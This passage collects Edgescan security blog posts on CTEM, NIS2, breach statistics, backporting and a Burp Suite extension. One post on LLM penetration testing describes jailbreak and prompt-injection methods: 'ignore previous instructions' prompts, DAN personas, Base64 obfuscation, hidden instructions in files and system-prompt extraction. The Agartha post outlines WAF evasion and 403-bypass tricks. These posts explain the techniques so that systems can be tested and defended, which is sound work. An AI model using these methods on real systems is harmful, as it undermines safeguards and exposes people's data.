uncovered and secured dozens of previously unknown websites and dozens of APIs, closing critical security gaps that had existed for months. Risk Reduction: Critical API vulnerabilities were identified and remediated before they could be exploited, preventing potential data breaches. Operational Efficiency: One-click asset integration streamlined security workflows, saving the security team hours of manual work weekly. Proactive Protection: Continuous monitoring ensured new cloud deployments were assessed immediately, minimizing exposure windows. Zero False Positives: The firm assessed thousands of assets accurately, maintaining clear vulnerability prioritization without noise. Rapid Response: PTaaS enabled deep testing of critical assets within days, strengthening defenses against emerging threats. What the Client Said "Edgescan's CTEM approach transformed our security program. Their ability to discover unknown assets, scale assessments, and provide on-demand penetration testing gave us confidence in our defenses. The clarity of their results and ease of integrating new assets into our security cadence have been transformational." – IT SECURITY MANAGER, GLOBAL CRM FIRM The CTEM Advantage Modern enterprises can't secure what they can't see. Edgescan's CTEM framework provides the visibility, scale, and accuracy needed to manage complex attack surfaces effectively. Combining continuous discovery, risk-based assessment, and expert validation, we help organizations stay ahead of evolving threats while maintaining operational efficiency. Ready to secure your complete attack surface? Start here. ### Edgescan's License Suggestions: Getting More Bang for Your Buck Ever feel like you're paying too much for security testing on some applications while others might need more attention? That's a common problem for large organizations juggling hundreds or thousands of apps. At Edgescan, we've created a solution that helps you right-size your security testing. The Right Testing at the Right Time Over the past few years, we've seen a shift away from traditional annual pen testing to more flexible approaches. Instead of the old "schedule it, scope it, bill it, report it" model, our customers want something more dynamic. The challenge is clear: If you have 500 pieces of technology, maybe 100 need full pen tests because customers or regulations demand it. But what about the other 400? What's the right level of testing? In an ideal world, you'd pen test everything. But that's expensive and not always the best use of resources. How License Suggestions Work Our license suggestions function helps solve this problem. Here's how it works: We start a piece of technology with an Essentials level license (our lowest tier) We run assessments to see what's actually there Based on what we find, we recommend the appropriate level of testing For example, imagine a non-critical web application where you're only doing unauthenticated testing. During scanning, we discover it has authenticated portions. We might suggest upgrading to authenticated testing for better coverage. Two months later, after authenticated testing, we might find complex workflows and controls that scanner can't adequately test. That's when we might recommend upgrading to a pen test. The process works in reverse too. We can suggest downgrading applications that no longer need intensive testing, helping you level off spending instead of watching it constantly increase. By the Numbers We've made this work at scale. As part of our right-sizing efforts: We've reviewed 8,124 applications to ensure the license was the correct fit Found sub-optimal licensing and recommended upgrades or downgrades on 1,846 Our customers have actioned 1,555 changes to licenses to get them at a more appropriate level One large customer alone has upgraded around 600 assets and downgraded about 400 others over two years. Three Key Benefits 1. Flexibility and value:  You get better bang for your buck. If you spend $100k with us, you'll get the right testing for each asset, maximizing your security budget while making spending more predictable. 2. Mature security program:  With a track record of upgrades and downgrades, you can show a dynamic, requirements-based vulnerability management program rather than following rigid checklists. 3. Better metadata:  Edgescan has 19 metadata fields for each asset. We populate six based on technical context, but you provide the other 12 about business impact, compliance requirements, and risk factors. This forces a healthy maturity in your asset management program. Works at Scale This approach especially benefits organizations with hundreds or thousands of applications. Your assets go into the system and come out with appropriate testing levels based on their actual risk profile and technical needs. Think of it as a funnel system that ensures each piece of technology gets exactly what it needs—no more, no less. The metadata fields that drive our recommendations include things like PCI status, direct internet access, business criticality, information classification, and availability requirements. By using these factors to determine the right level of testing, we help ensure your security budget goes where it matters most. More detailed information about asset metadata attributes are available in our public-facing knowledgebase here. Schedule a demo to see how Edgescan's license suggestions can optimize your security budget while ensuring appropriate coverage for all your applications. ### How Edgescan Enhances M&A Success Through Cybersecurity Risk Management In the world of mergers and acquisitions, cybersecurity has become a critical factor that can make or break a deal. Most M&A transactions involve rapid integration of different IT systems, applications, and data assets. This process exposes acquiring companies to unknown vulnerabilities, legacy systems, and potentially active breaches. The financial implications are severe. According to Gartner, incomplete cybersecurity due diligence can lead to regulatory penalties, reputation damage, and significant financial loss. The M&A Cybersecurity Challenge When you acquire a company, you're also acquiring their security problems. Hidden vulnerabilities in legacy systems. APIs exposed to the internet. Misconfigured cloud assets. These risks often surface after the deal closes, when remediation becomes exponentially more expensive. Post-acquisition breaches can cost millions in emergency patching, forensic investigations, and system overhauls. Regulatory fines under GDPR or CCPA add further damage. Customer trust, once lost, takes years to rebuild. How Edgescan Addresses These Risks Edgescan provides end-to-end vulnerability management that identifies and validates threats across the entire digital estate of both acquiring and target companies. Continuous Attack Surface Management discovers and profiles all digital assets - web applications, APIs, and network infrastructure. No asset goes unassessed. Validated Vulnerability Assessments combine automated scanning with human validation by CREST and OSCP-certified analysts. This reduces false positives and prioritizes real threats over scanner noise. Seamless Integration enables smooth onboarding of target company assets into the acquiring firm's cybersecurity ecosystem. Visibility and control continue throughout the transition. Risk-Rated Reporting provides actionable insights with clear priorities. Security teams focus on critical vulnerabilities first. Real-World Impact: A 2025 Case Study Early in 2025, Edgescan performed cybersecurity due diligence for a large enterprise acquiring a mid-sized technology firm. Our assessment uncovered several critical vulnerabilities in the target's infrastructure, including unpatched systems, exposed APIs, and misconfigured cloud assets. These findings were validated by our expert analysts and presented to the acquiring company's executive team. As a direct result, the enterprise renegotiated the acquisition terms, reducing the purchase price by over $1,000,000. This protected the buyer from future remediation costs while demonstrating the strategic value of incorporating cybersecurity intelligence into M&A negotiations. The Bottom Line Cybersecurity is no longer a post-acquisition concern - it's core M&A strategy. Early detection of vulnerabilities transforms risk into negotiation leverage. Critical findings become cost savings opportunities. Edgescan empowers organizations to make informed decisions by providing deep visibility into target companies' security posture. Through continuous monitoring and validated assessments, we protect acquiring firms from hidden risks while delivering measurable cost savings. Ready to secure your next acquisition? Start here. ### Why Accuracy is the Bedrock of CTI, Vulnerability Management and Relieves Alert Fatigue False positives in cybersecurity waste time and money. They happen when security tools flag normal activities as threats. This creates big problems for security teams who need to focus on real issues. Think about it. You get hundreds of alerts. You check them one by one. Many turn out to be nothing. Meanwhile, actual threats might slip through. This isn't just annoying. It's dangerous. The Foundation Matters Top of the funnel matters most. If you start with bad data, everything that follows is compromised. You can add all the fancy threat intelligence and metadata you want. But if the original vulnerability report isn't accurate, you're just making the noise problem worse. All that extra information amplifies false positives instead of helping. Accuracy isn't just important. It's essential. The Real Cost of False Positives 1. Resource Drain and Wasted Time Security teams spend too much time chasing ghosts. The 2023 Ponemon Institute study showed organizations waste about 25% of their security team's time investigating things that aren't real threats. For teams already stretched thin, this means critical vulnerabilities sit unpatched longer. A security analyst who spends three hours checking a false positive could have used that time patching three critical vulnerabilities. Unlike automated tools like Nessus or Qualys that flood you with unverified alerts, human-validated results focus your team on what really matters. 2. Increased Operational Costs False positives cost real money. Each alert needs investigation. That means people, computing resources, and sometimes expensive consultants. A medium-sized company might spend $150,000 yearly just handling false positives. Their mean time to remediation (MTTR) grows longer as teams chase phantom issues while actual vulnerabilities remain open. The difference between automated-only tools and expert-validated approaches can save thousands of hours and dollars annually. 3. Alert Fatigue and Desensitization "The security tool that cried wolf" is a real problem. When most alerts are false, teams start ignoring them. The 2024 ESG report found 34% of security professionals simply ignore certain alerts because they don't trust them. This creates a dangerous situation. When a real threat comes in, it might be overlooked. One security team I worked with had so many false positives they created a "probably ignore" folder. They later found a critical vulnerability sitting there for weeks. Human-verified approaches ensure alerts deserve attention. 4. Erosion of Trust in Security Tools Teams stop trusting tools that lie to them repeatedly. They question results and may avoid using expensive security solutions altogether. Take scanning tools like Burp, Rapid 7, or Qualys. They're powerful but need constant human verification. Without it, results vary wildly. One client told me they only trust about 40% of their vulnerability scanner results. A high accuracy rate (92% automated validation with 8% expert verification) builds trust that the results are worth acting on. 5. Delayed Response to Real Threats While teams handle false alarms, real threats wait. The 2025 Vulnerability Statistics Report showed high-risk vulnerabilities took 60% longer to fix when mixed with false positives. Attackers don't wait. They exploit vulnerabilities quickly, especially in fast-moving DevOps environments. When your team finds a SQL injection vulnerability three weeks late because they were busy with false positives, that's three weeks attackers could have accessed your customer data. 6. Impact on Compliance and Audits False positives create compliance headaches. Organizations must document and justify every reported vulnerability, even fake ones. For industries like finance or healthcare under PCI DSS or HIPAA regulations, this doubles the paperwork. During one audit, a client had to explain 47 "critical vulnerabilities" that weren't actually vulnerabilities at all. They spent three days on documentation that added no security value. PCI-approved scanning with validated results eliminates this wasted effort. 7. Negative Impact on DevOps and Business Agility False positives break development workflows. They stop code releases and frustrate developers who must fix "problems" that don't exist. The 2024 Forrester study found 40% of DevOps teams see false positives as a major barrier to security integration. One development team told me they disabled certain security checks entirely because false positives delayed releases too often. This created actual security gaps. Accurate reporting that integrates smoothly with CI/CD pipelines keeps development moving without sacrificing security. The Value of a False-Positive-Free Approach The false positive problem needs a hybrid approach. Technology alone isn't enough. Neither is human review alone. You need both working together. Based on reviews from actual users (4.7/5 on Gartner Peer Insights), combining advanced analytics with expert validation eliminates almost all false positives. Security teams can focus on real issues instead of chasing shadows. Companies using the old approach rely too heavily on automation. They produce lots of alerts but little confidence. Expert validation delivers intelligence you can act on. This cuts alert fatigue, saves money, and speeds up fixing real problems. The Bottom Line False positives waste resources, cause alert fatigue, delay threat response, destroy trust in security tools, complicate compliance, and disrupt business. They create security gaps by distracting teams from real vulnerabilities. A false-positive-free platform with human validation and full-stack coverage solves these problems. It offers a more efficient and reliable solution than traditional automated scanning alone. ### Why AI Security Testing Matters to Your Business: Understanding LLM Penetration Testing AI systems like Large Language Models (LLMs) are now woven into the fabric of your business operations. They handle customer service inquiries, write content, analyze data, and sometimes even participate in decision-making processes. But as these powerful tools become central to your operations, a critical question emerges: how secure are they against attackers?When your company deploys these AI tools, you face a new landscape of security risks unlike those of traditional systems. Hackers can manipulate LLMs in unique ways that bypass conventional security measures.The Hidden Vulnerabilities in Your AI SystemsSecurity professionals use penetration testing (or "pentesting") to identify weaknesses before hackers do. With AI systems, this practice takes on new dimensions. Here's what can go wrong without proper testing:Information Leakage: Attackers can extract sensitive company information, intellectual property, or customer data that was inadvertently included in the AI's training data.Prompt Injection: Hackers can feed carefully crafted inputs that trick your AI into ignoring its safety guidelines. This is similar to how SQL injection works in databases but requires different testing approaches.Security Guardrail Bypass: Just as your teenage child might find creative ways around house rules, attackers create "personas" (like the DAN examples mentioned by security researchers) that trick LLMs into breaking their own rules.API Vulnerabilities: Your AI likely connects to other systems through APIs, creating potential entry points for attackers to access your broader infrastructure.Real-world examples show these aren't theoretical concerns. Twitter's AI service (Grok) had a vulnerability where it would follow instructions hidden in other users' posts. This means someone could use your own AI tools as a gateway to attack your company's systems or reputation.Penetration Testing for AI: What Your Security Team Should Be DoingYour technology team needs to adapt traditional security testing approaches for AI systems. Here are key areas they should focus on:1. Information GatheringSecurity testers should thoroughly map what your AI can access and its functionality. Can it read internal documents? Connect to customer databases? Send emails? The broader its access, the larger your attack surface becomes.Pentesting teams should examine both direct model interactions (through chat interfaces) and indirect methods (through file uploads or web browsing features).2. Guardrail Testing and Prompt InjectionSkilled pentesters attempt to break your AI's ruleset through various techniques:Basic prompt injections that directly ask the AI to ignore previous instructionsPersona adoption techniques where the AI is asked to role-play entities free from restrictionsBase64 encoding or other obfuscation methods to slip restricted content past filtersUsing the AI's own error messages against it to reveal system informationGood pentesters try these approaches systematically, documenting which safety measures hold and which fail.3. Document and File Processing SecurityIf your AI can process uploaded files or browse websites, pentesters should test what happens when someone uploads documents containing hidden instructions or directs the AI to malicious web pages.This indirect prompt injection represents a serious risk many companies overlook entirely.4. Sensitive Data Exposure TestingPenetration testers should probe whether your AI can be tricked into exposing:Authentication credentialsInternal document contentsMeeting summaries or calendar informationDatabase connection detailsAWS keys or other cloud access tokensProduction system details5. System Prompt RecoveryPentesters attempt to extract the core instructions (system prompt) given to your AI. This can reveal internal policies, capabilities, and potential security bypasses that could be exploited.Key Questions to Ask Your Security TeamAs a business leader, you don't need technical expertise to ensure proper AI security. Ask these questions:"Have we conducted comprehensive penetration testing specifically tailored to our AI systems?""What sensitive information repositories can our AI access, and have we tested the security of those connections?""What attack scenarios involving our AI have we simulated, and what were the results?""How do we test new LLM features before they reach production?""Do we have a regular schedule for AI security testing, especially after model updates?""What industry standards or frameworks are we following for AI security?""How do our AI security measures compare to other companies in our industry?"Practical Steps for Better AI SecurityEven without technical background, you can improve your company's AI security posture:Mandate Regular LLM Penetration Testing: Just as you would for websites and apps, require routine security assessments specific to AI.Apply the Principle of Least Privilege: Ensure your AI can only access the information and systems it needs to function.Implement Strong Authentication: Control who can interact with your AI systems, especially those with access to sensitive information.Create an AI Incident Response Plan: Prepare for what happens if your AI is compromised or begins producing harmful outputs.Consider Third-Party Experts: AI security is a specialized field. External penetration testers with LLM expertise can find vulnerabilities your internal team might miss.The Business Case for AI Security TestingAI security isn't merely a technical concern—it's a business imperative. The consequences of inadequate testing can include:Financial losses from data breaches or system compromisesRegulatory penalties if customer data is exposedReputation damage if your AI produces harmful contentLoss of competitive advantage if proprietary information leaksLegal liability if your AI causes harm to usersThe investment in proper AI security testing is minimal compared to these potential costs. Most AI security incidents happen not because the technology is inherently flawed, but because companies rush to implement it without appropriate security measures.Looking ForwardAI capabilities will continue to expand rapidly, and so will the techniques attackers use to exploit them. Regular penetration testing helps you stay ahead of these evolving threats.Make sure your security team treats AI systems with the same, if not greater, care as any other critical business system. The fundamental principles remain: identify vulnerabilities before attackers do, protect sensitive data, test thoroughly, and prepare for incidents.Edgescan's specialized AI security assessment services can help you identify and remediate vulnerabilities in your AI systems before they become targets. Our expert team combines deep AI knowledge with proven security testing methodologies to deliver comprehensive protection for your most advanced technologies.Remember, an ounce of prevention is worth a pound of cure. Taking proactive steps with Edgescan to secure your AI systems today prevents costlier problems tomorrow. As AI becomes more deeply integrated into your business operations, partner with Edgescan for specialized AI penetration testing to ensure your innovations remain both powerful and protected.Schedule a demo today to see how Edgescan can strengthen your AI security posture and safeguard your most innovative systems. ### NIS2: Six Months After Implementation – What We've Learned In the high-stakes arena of modern cybersecurity, strong protection is essential for both business continuity and regulatory compliance. The NIS2 Directive represents the EU's most comprehensive cybersecurity legislation to date. Here's what we've seen six months after full implementation and how vulnerability management helps with compliance. Current State of NIS2 NIS2 created a unified legal framework for cybersecurity across the EU. It raises cybersecurity standards through wider scope, clearer rules and stronger supervision tools. After coming into force in January 2023, EU countries had to add it to their laws by October 17, 2024 – a deadline that passed six months ago. Unlike the original directive, NIS2 significantly expanded its reach. It added 8 more sectors to the original list, for a total of 15 sectors. This means thousands more organizations now face regulatory requirements for cybersecurity measures. Real-World Implementation Challenges The first six months have shown several challenges: Rules vary between countries Smaller organizations struggle with limited resources Fitting NIS2 with existing security systems is hard Checking supply chain security takes time Meeting incident reporting deadlines is tough Companies need more than just firewalls and anti-virus. They must have plans for risk management, incident response, and supply chain security. Many are finding they need to be much more active with security. Vulnerability Management: The Foundation of Compliance As organizations work through initial compliance efforts, vulnerability management has become essential. You can't protect systems if you don't know where the weaknesses are. The directive requires regular risk assessment and mitigation. Companies that are doing well have: Regular scanning of all systems Ways to rank which issues to fix first Clear steps for fixing problems Automatic compliance reports Checks on supplier security The Edgescan Approach: Lessons from the Field Since NIS2's full implementation, we've helped many organizations meet requirements. Our platform provides the comprehensive coverage needed in today's regulatory environment. 1. Continuous Testing Edgescan provides continuous vulnerability scanning and assessment across both network infrastructure and application layers. This aligns with NIS2's requirement for organizations to regularly assess and mitigate risks. Companies using continuous assessment have demonstrated significantly faster compliance verification. 2. Focus on What Matters Not all security issues are equally important. Edgescan helps organizations focus on the biggest risks first. Initial NIS2 assessments have revealed that organizations using risk-based prioritization reduce their mean time to remediation by up to 60%, addressing critical issues before they impact compliance status. 3. Complete Coverage NIS2 requires security across all systems. Our full-stack approach checks everything from web applications to network equipment. This holistic view ensures nothing gets missed when proving compliance. 4. Real Issues Only False alarms waste time and resources. Edgescan combines automatic scanning with human experts who check each issue. This hybrid approach eliminates the noise that often plagues vulnerability management programs, allowing security teams to focus on genuine issues. 5. Clear Documentation NIS2 requires good documentation. During the first six months, organizations with comprehensive reporting have navigated regulatory scrutiny more effectively. We provide reports that clearly show your security status and remediation efforts – essential evidence during compliance audits. Enforcement Reality Check With NIS2 now in full effect, enforcement has started. Early patterns show: Focus on critical infrastructure first  Checks of documentation and processes Tests of incident response plans Reviews of supply chain security Questions about executive oversight Organizations with good vulnerability management have generally done better in these assessments, establishing a pattern for future enforcement priorities. Beyond Basic Compliance: Building Cyber Resilience Smart organizations are using NIS2 to improve security, not just check boxes. Good vulnerability management protects against real threats. Forward-thinking companies are turning compliance investments into strategic security advantages by implementing a continuous, risk-based approach. The Path Forward: Your NIS2 Strategy Six months in, we have a clearer picture of what works. Organizations should adjust their strategies based on real enforcement patterns. Vulnerability management remains the foundation of effective compliance. If you're still working toward full compliance, start now. If you've established baseline compliance, focus on optimization and integration with broader security programs. With Edgescan's comprehensive vulnerability management platform, you can handle NIS2 requirements with confidence while building stronger defenses against security threats in 2025 and beyond. ### Inside the 2025 Verizon DBIR: Edgescan's Critical Insights on Web Application Security The 2025 Verizon Data Breach Impact Report paints a stark picture of web application security, and as someone who contributes hundreds of thousands of vulnerabilities yearly to this report, I see the truth daily at Edgescan. We're proud to be a data source for this year's DBIR again - Verizon's annual report is crucial for industry understanding. Here's what's really happening in the web application layer, straight from our continuous scanning of APIs and web apps across thousands of domains.Basic Web Application Attacks Are Back in StyleThe "get in, get the data, get out" attacks are alarmingly common. With 1,701 incidents and 1,387 confirmed data compromises, these aren't isolated events. What worries me most? Every single breach came from external actors. No insider threats here - it's the bad guys coming at you from outside your walls.But here's the twist: espionage now drives 61% of these attacks. That's a major shift from financial motives dominating previous years. The data they're after? Mostly "other" data (65%), but personal information (36%) and credentials (35%) are right behind.The Credential Crisis Gets WorseThe numbers don't lie. Stolen credentials power 88% of web application breaches. Where are attackers finding these credentials? Web applications (39%), development environments and CI/CD pipelines (66%), and cloud infrastructure (43%). That's right - your development secrets are more exposed than your web apps.The credential ecosystem is sophisticated:Infostealers grab passwords and cookiesMarketplaces sell themPremium channels offer exclusive accessLive logs give real-time access to breached dataAnd remember - 54% of ransomware victims had their domains in infostealer logs. The connection is clear.What Our Vulnerability Data ShowsOur 2025 Vulnerability Statistics Report digs deeper into what automated scanners miss. Here's what you need to know:Over 33% of vulnerabilities found across the stack are critical or high severitySQL Injection (CWE-89) is still the top web vulnerability - it's been that way since 2022Web apps take longer to fix: 74.3 days vs 54.8 days for network issuesLarger companies are worse at patching: 45.4% of their vulnerabilities remain unfixed after 12 monthsThe numbers are staggering: 40,009 new CVEs in 2024. CISA added 185 to their Known Exploited list. And 768 CVEs saw real-world attacks - that's 20% more than 2023.Different Industries, Different ProblemsSoftware companies fix things faster (63 days average). Construction firms? Not so much (104 days). The gap shows how industry matters in security response.But here's something troubling: the complex vulnerabilities that automated tools miss? You need human expertise to find them. And those are often the ones that matter most.The Attack Methods Keep WorkingThe basics still work:Brute force attacks haven't gone awayVPN and edge device exploits jumped from 3% to 22%42% of exploits hit web applicationsOnce in, attackers use backdoors to maintain accessWhat Really Needs to ChangeBased on what we see daily:MFA Implementation: Multi-factor authentication should be mandatory and not optional for both Externally Exposed Applications and for Remote Network Access.Scrutinize Logins: Implement additional protection around cookies and session keys.Passphrase Management: Encourage long passwords and secure configurations.OS Hardening: Secure configurations for endpoint systems and domain controllers.Continuous Vulnerability Management: Establish and maintain a vulnerability management processEstablish and Maintain a Remediation Process: Prioritize vulnerabilities which matterThe stats don't lie. Web applications remain a prime target, credentials are too easy to steal, and most organizations aren't patching fast enough. The threat actors are organized, motivated, and successful.Download our full Vulnerability Statistics Report for the complete data: https://www.edgescan.com/stats-report/The trend is clear. Are you ready for what's coming? ### Agartha: A Practical Burp Suite Extension for Smarter Web Security Testing If you spend a lot of time doing web application security testing, you're probably using Burp Suite. And if you're using Burp Suite, you’ve likely explored its extension library to make your work easier or more efficient. One extension I use almost every day is called Agartha. It’s not flashy. It’s not hyped up. But it works—and it’s helped me spot real issues faster and with less effort.This post isn’t a sales pitch. I’m not affiliated with the developer. I just think it’s a solid tool that more people should know about. If you're doing penetration testing or red teaming, Agartha can save you time and help you dig a little deeper.Let’s look at what it does, how it works, and why I keep it in my Burp Suite setup.What Is Agartha?Agartha was developed by Volkan Dindar and is a free extension available through the BApp Store in Burp Suite. It includes several tools, but at its core, it helps you build smarter payloads, explore access controls, and automate common testing tasks. It’s aimed at testers who already know what they’re doing but want a more efficient way to do it.There’s no magic involved. Agartha doesn’t replace your judgment or your skills. But it can reduce repetitive work, expose issues that are easy to miss, and give you helpful shortcuts.Dynamic Payload GeneratorOne of Agartha’s most useful features is its Dynamic Payload Generator. This lets you quickly build lists of payloads to test for common vulnerabilities. It covers things like:SQL injection (SQLi)Local File Inclusion (LFI)Remote Code Execution (RCE)The extension comes preloaded with payload templates and bypass tricks. You can also customize your own. What’s helpful here is that Agartha adjusts payloads in real time, letting you adapt on the fly as you test.And these aren’t just the same 10 strings you’ve seen on every cheat sheet. Agartha includes evasion techniques—things like altered encodings, header tricks, and subtle format changes. These can help you slip past filters or protections like WAFs.You could build all of this manually, but doing it with Agartha saves time. It also helps keep your testing organized, especially when working under time pressure.Authorization MatrixAccess control is often overlooked, and it’s hard to test thoroughly. Agartha helps with this through something it calls the Authorization Matrix.Here’s how it works. You test an application as different users—maybe an admin, a regular user, and a guest. Agartha tracks which URLs each one accesses and builds a map. If one user can access something they shouldn’t, it flags that.This isn’t a full access control scanner. It won’t write your report for you. But it gives you a simple view of where access breaks down.For example, maybe a regular user shouldn’t be able to hit /admin/users. You try it—and you get a 200 OK. Agartha logs that as a mismatch. This makes it easier to spot privilege escalation paths, especially in apps with dozens (or hundreds) of endpoints.You can also export this matrix and use it as evidence in your findings. Clients appreciate seeing this kind of data—it’s clearer than a paragraph of text.Convert HTTP Requests to JavaScriptSometimes, you need to build a proof of concept. You’ve found an XSS, or maybe a CSRF. Now you want to show it in action.Agartha helps by converting HTTP requests into JavaScript. This saves you the time of writing out fetch() or XMLHttpRequest code by hand. You copy the request, click a button, and Agartha turns it into JavaScript. You can then drop this into a payload, a test page, or a browser console.This is especially useful when chaining vulnerabilities—say, combining XSS with RCE or CSRF. Agartha helps you move quickly from discovery to demonstration.403 Bypass TestingWe’ve all run into this: you try to access a page, and you get a “403 Forbidden” response. It’s frustrating, and sometimes the block isn’t as solid as it looks.Agartha has a built-in 403 Bypass module. It tries small changes to see if the restriction can be bypassed. That might mean:Modifying headers like X-Original-URL or X-Rewrite-URLChanging the request methodAdjusting the URL (adding a trailing slash, dot, or encoded character)None of these tricks are new. But having them all in one place, and being able to automate them, makes the process faster. You don’t have to remember every variation or write a script on the fly.And yes, sometimes it works. You’ll find a bypass and gain access to something the app was trying to hide. Even when it doesn’t work, you’ve ruled out some options quickly and can move on.Why I Use ItAgartha isn’t the only tool out there that does these things. You can find scripts, other extensions, or write your own. But what I like about Agartha is that it puts several useful tools in one place—and they all work well together.It helps with payload generation, access testing, proof-of-concept building, and bypass attempts. That’s a lot of value for one extension. And it fits into my existing workflow without slowing me down.I don’t rely on it blindly. I still write my own payloads and do manual checks. But when I want to save time or double-check something, Agartha is where I go.A Few Things to Keep in MindAgartha is best used by testers who already know the basics. It’s not a teaching tool.It doesn’t replace logic or experience. It supports your testing—it doesn’t do it for you.Like any tool, it can give false positives or miss things. Always confirm what you find.You’ll get more out of it if you customize the payloads and explore all the features.Final ThoughtsThere’s a lot of noise in the security tool space. New scanners, AI-based platforms, and one-click pentesting tools show up every week. Most of them promise too much and deliver too little.Agartha doesn’t do that. It’s simple, practical, and focused. If you do hands-on testing with Burp Suite, it’s worth trying.You won’t find marketing pages or slick videos for it. Just an honest tool that can make your job easier.If you haven’t used Agartha yet, give it a shot. And if you already use it, I’d be curious to hear what you think—or how you use it differently. ### Edgescan Recognized in Forrester’s 2025 Security Guide We’re pleased to share that Edgescan is included in Forrester’s Top Recommendations for Your Security Program, 2025. This is one of the most widely read cybersecurity reports each year, and being featured in it is a meaningful acknowledgment of the work we do. Forrester highlights continuous security testing as a key capability for 2025. Edgescan is listed among the select group of vendors delivering this capability. In a crowded space, that kind of recognition matters. Security leaders face constant change — evolving threats, new regulations, and shifting technologies. Forrester’s report provides clear, actionable guidance to help navigate these changes. It focuses on four areas: Managing new business and legal consequences Adapting to changing technology Responding to evolving threat landscapes Preparing for emerging technologies Continuous security testing supports all four. Visibility is important, but it’s just the start. Validating exposures, prioritizing risk, and enabling response are essential steps — and that’s where Edgescan plays a role. We’re proud to be trusted by organizations to secure cloud environments, application code, and infrastructure. Inclusion in this report reinforces that our approach aligns with the industry's needs. This guide is a valuable resource for planning your 2025 strategy. If you’re already working with Edgescan, thank you. We look forward to continuing to support your security goals. You can access the full report here (if you have a subscription): https://www.forrester.com/report/top-recommendations-for-your-security-program-2025/RES182128 ### ‘Backporting’ Challenges in Cyber Security Overview of ‘Backporting’ in Cyber SecurityBackporting is the process of taking security patches, bug fixes, or feature updates from a newer version of software and applying them to an older version that is still in use. This is often necessary when organizations rely on legacy systems that cannot be upgraded to the latest version due to compatibility, operational, or dependency constraints.Common scenarios where backporting is used:1. Security Patching in Legacy SystemsScenario: An organization is running CentOS 7, which includes an older version of OpenSSL. A critical vulnerability (e.g., Heartbleed) is discovered, but upgrading to the latest OpenSSL version would break compatibility with existing applications.Backporting Solution: The administrative team applies a backported security patch from the latest OpenSSL version while keeping the same CentOS 7 OpenSSL package version to maintain compatibility.2. Maintaining Stability in Enterprise SoftwareScenario: A financial institution relies on a custom-built web application that runs on an older version of Java (JDK 8). Upgrading to JDK 17 would require significant code refactoring, delaying business operations.Backporting Solution: The organization applies specific JDK 17 security fixes to JDK 8, ensuring critical vulnerabilities are patched while avoiding a full upgrade.Difficulties with ‘Backporting’ in Cyber SecurityBackporting is often used as a temporary solution to maintain security in legacy systems, but it introduces significant risks and challenges from a cybersecurity standpoint. Backporting often creates issues for cyber security teams such as tracking, residual risk, delays in response to emerging threats, and additional difficulties with it comes to audit and compliance complications.1. Incomplete Security Fixes & Residual VulnerabilitiesBackported patches may fix specific vulnerabilities but often lack broader security improvements from newer software versions. Systems may remain vulnerable to related exploits or attacks that the newer version fully mitigates.Example: A backported OpenSSL patch may fix a buffer overflow issue, but newer versions include hardened memory protections that aren't included in the backport, leaving the system partially vulnerable.2. Delayed Response to Emerging ThreatsAdapting and testing security patches for older versions takes time, leading to delayed deployments. Along with organizations remain exposed to zero-day vulnerabilities for longer periods increasing risk. It is recommended that organizations develop a patching policy that prioritizes official updates over backporting whenever possible.Example: A new RCE (Remote Code Execution) vulnerability is discovered in Apache 2.4.58. However, the organization runs Apache 2.4.29 and needs to backport the fix. The process of backporting takes weeks or months, increasing the attack window for adversaries.3. Security Compliance & Audit ChallengesMany security frameworks (e.g., PCI-DSS, NIST, ISO 27001, NIS2, GDPR) require the use of vendor-supported software and timely patching. Backporting complicates compliance verification. Security scanners detect outdated software versions and report vulnerabilities that are technically a false positive. This is due to vulnerability scanning does execute architectural review of components of a system targeted for vulnerability assessment. Backporting can often lead to auditors rejecting backported patches unless extensive documentation is provided.This is especially true when doing regular required PCI-DSS ASV assessments using scanning systems as required by PCI-DSS. This is due to rigorous requirements for specific ‘scanning’ methods and findings doctrine for PCI ASVs.Example: A company running PHP 7.4 with backported security fixes fails a PCI-DSS scan because the scanner flags PHP 7.4 as vulnerable. The company must manually justify that fixes were applied, delaying compliance approval. Simply stating that a service has been patched will generally not be enough of a justification when it comes to PCI-DSS, and others compliance frameworks (GDPR, ISO, NIS2) without the specific security patch reference. There will be many different patches released for outdated versions of software, each one to fix a specific vulnerability or group of vulnerabilities.Again, it is recommended that organizations develop a patching policy that prioritizes official updates over backporting whenever possible. While also maintain detailed patching documentation and work with compliance auditors to validate backported fixes.4. Increased Attack Surface Due to Dependency IssuesSecurity patches are designed for modern system architectures, dependencies, and libraries. Backporting may create compatibility issues that introduce new security risks. A patched application may still be vulnerable due to outdated dependencies that lack the latest security protections.Example: A Node.js application runs on an outdated Express.js framework with backported security fixes. However, the backport does not address critical dependency vulnerabilities in other libraries, leaving the system exposed.Security teams should work closely with application and system owners to understand what is covered in a specific backport solution and what residual risk is present thus considering additional controls to mitigate the residual risk. Senior security staff would then need to adjust their Business Impact Analysis (BIA) and Risk Assessment (RA) accordingly to account for the residual risk to the organization.5. Backported Patches Are Not Officially SupportedWhen backporting vulnerabilities, vendors do not officially support backported patching, meaning organizations must rely on in-house security teams or third parties to maintain them. If a backported patch introduces bugs or breaks functionality, there is no official vendor support to resolve issues. Even with long-term support (LTS) contract, backporting is not covered and often would need additional internal resources to support end-of-life (EOL) systems and components, or third-party contracts.Example: A company backports a security patch to an end-of-life Linux distribution (e.g., Ubuntu16.04). A critical bug emerges after patching, but the vendor no longer provides updates, forcing the company to manage fixes themselves. Thus, opening up delays in security critical business systems, creating additional residual risk, audit and compliance complications, and additional operational overhead to cyber-security teams.6. Increased Complexity & Maintenance OverheadBackporting creates technical debt, making long-term security management more complex and expensive. Security teams must manually track which patches have been applied and ensure they remain effective over time. This creates additional issues like future updates becoming harder, increasing the risk of misconfigurations and security gaps.Example: An organization running an ERP system on Java 8 continuously backports security fixes instead of upgrading. Over time, maintaining the patches becomes costly, and the system remains vulnerable to modern attack techniques.Establish a clear policy for when to backport and when to upgrade, ensuring long-term security. Backporting should only be considered a short-term mitigation and never a long-term fix. Application teams, system owners, system administrators, and leadership should understand the goals of the cyber security program and if additional resources are needed, routine BIAs and RAs would help to establish strategies to solve long-term backporting.7. Exposure to Supply Chain AttacksWith the complexities of business technologies and engagements today, organizations may rely on third-party or unofficial sources for backported patches, increasing the risk of supply chain attacks.Example: A backported patch for an outdated WordPress plugin is downloaded from an untrusted third-party repository. The patch contains malicious code, allowing attackers to inject malware or ransomware into the system.Though many organizations have talented development and admin teams, the speed at which business moves and expands today is hard for organization’s teams to keep up. More reliance on third-party resources for backporting security flaws in systems, applications, and components is ever more prevalent. Therefore, only use trusted sources for security patches and verify patch integrity before deployment. However, even trusted sources may also have compromised solutions, it is best to remain in an N-1 or up-to-date state wherever possible.Final ThoughtsBackporting 